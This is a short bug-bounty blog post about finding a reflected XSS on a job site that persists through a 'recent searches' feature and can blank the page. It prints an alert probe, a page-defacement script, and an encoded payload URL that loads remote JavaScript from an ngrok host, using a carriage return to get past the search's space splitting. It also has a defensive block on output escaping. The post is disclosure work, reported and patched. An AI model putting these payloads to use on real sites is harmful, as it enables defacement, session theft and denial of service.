RXSS leading to DOS

Zatikyan Sevada
2 min read · Sep 8, 2023

Hello everyone! I recently started my hacking journey and wanted to write a blog post about some interesting hacking I did lately. At the end there is a video PoC, guys, don't miss it (the video was made after I had successfully visited the malicious link). I will call the site x.com. The website is a job-finding platform. When I am looking for vulnerabilities I quickly check for RXSS, and this website had 3 pages, each with its own search box. I quickly tested them; I actually found the vulnerable one first, and then figured out that the others were properly escaping the output))

This RXSS actually led to ATO (account takeover) through cookie stealing, because the session cookie isn't HttpOnly, but I don't want to cover that scenario here; it's a classic one and I think you have heard of it already.

Ok, now back to the RXSS. The interesting thing was that after I made the page run alert() by sending

?x="><script>alert()</script><!--

Then, on navigating back, I suddenly noticed that the alert popped up again. This means that if you are on a vulnerable page, vulnerabilities may show themselves to you without you even trying hard.

Now what was that? After simply inspecting, I found out that the search had a "recent searches" feature which stored my recent searches, and it came to my mind that, first, we can annoy people who visit the malicious link, and second, fully disable access to that page by making JS delete all the HTML in x.com/lang/jobs. So for testing I quickly made a modify.js file and wrote something like

document.body.removeAttribute("class");
document.body.style.fontSize = "unset";
document.body.style.height = "100%";
document.body.innerHTML = "<br/><br/><h1 align=center style='color:green; font-size: 36px; font-weight: unset'>This page is hacked by Sevada797<br/>(Only who visits malicious link will get affected)</h1>";
document.body.style.backgroundColor = "black";

For the PoC I knew that I might not be able to recover from this, because the page might break and I wouldn't be able to find the request needed to delete the entry from the recent searches, so I only tested it while recording the video.

And then I ran the test; the payload link was

x.com/lang/jobs?x=%22%3E%3Cscript%0Dsrc=https%3A%2F%2Fngrokurl.ngrok-free.app%2Fmodify.js%3E%3C%2Fscript%3E%3C!--

I used %0D because spaces were being split on: my whole payload was getting embedded in separate spans, each of them returning 'keyword not found', whereas a carriage return is not split on by the search yet still separates the tag name from src= for the browser.

I also appended <!-- because there were multiple reflections, each with the same HTML elements, so I just commented the rest out.
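The two weaknesses described above, the "recent searches" list rendering stored terms as raw HTML and the search splitting on the space character only, next to their hardened versions, as an added example that is not code from the original post or from the affected site; the function names and the <span> markup are assumptions.

```javascript
// Added example, not the affected site's code: a minimal model of the
// "recent searches" rendering, weak and hardened versions side by side.
// Function names and the <span> markup are assumptions.

// The reflected payload quoted in the post, as the site would have stored it.
const PAYLOAD = '"><script>alert()</script><!--';

// Weak tokenizer: splits on the space character only, so a query joined
// with %0D (carriage return) survives as a single token.
function splitOnSpaces(query) {
  return query.split(' ').filter(Boolean);
}

// Hardened tokenizer: every whitespace character, CR included, separates
// keywords. This alone does not stop XSS; output encoding does.
function splitOnWhitespace(query) {
  return query.split(/\s+/).filter(Boolean);
}

// Weak renderer: interpolates stored terms straight into markup, so a term
// containing "><script> executes again on every later visit to the page.
function renderRecentSearchesUnsafe(terms) {
  return terms.map(t => `<span class="recent">${t}</span>`).join('');
}

// Output encoding for the HTML text-content context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Hardened renderer: the stored term is displayed literally, never parsed as HTML.
function renderRecentSearches(terms) {
  return terms.map(t => `<span class="recent">${escapeHtml(t)}</span>`).join('');
}

// Triage helper for defenders: find already-stored terms that carry markup,
// so a poisoned recent-search list can be purged on the server side.
function findPoisonedTerms(terms) {
  return terms.filter(t => /[<>"']/.test(t));
}
```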

Now consider that if someone wanted to harm the company, they could simply host an (initially empty) modify.js, infect lots of users by spreading the malicious link, and then, when they wanted to launch the attack, paste the payload into the .js file.

I reported this to the company and they have made a patch.

Thanks for reading, let me know if this was interesting)

(Next write-up will be about how I found a blind SQL injection by manipulating the URL)

Follow me on Instagram https://instagram.com/sevada797

DM for collab.

Don’t forget to watch the cool video below 👇👇
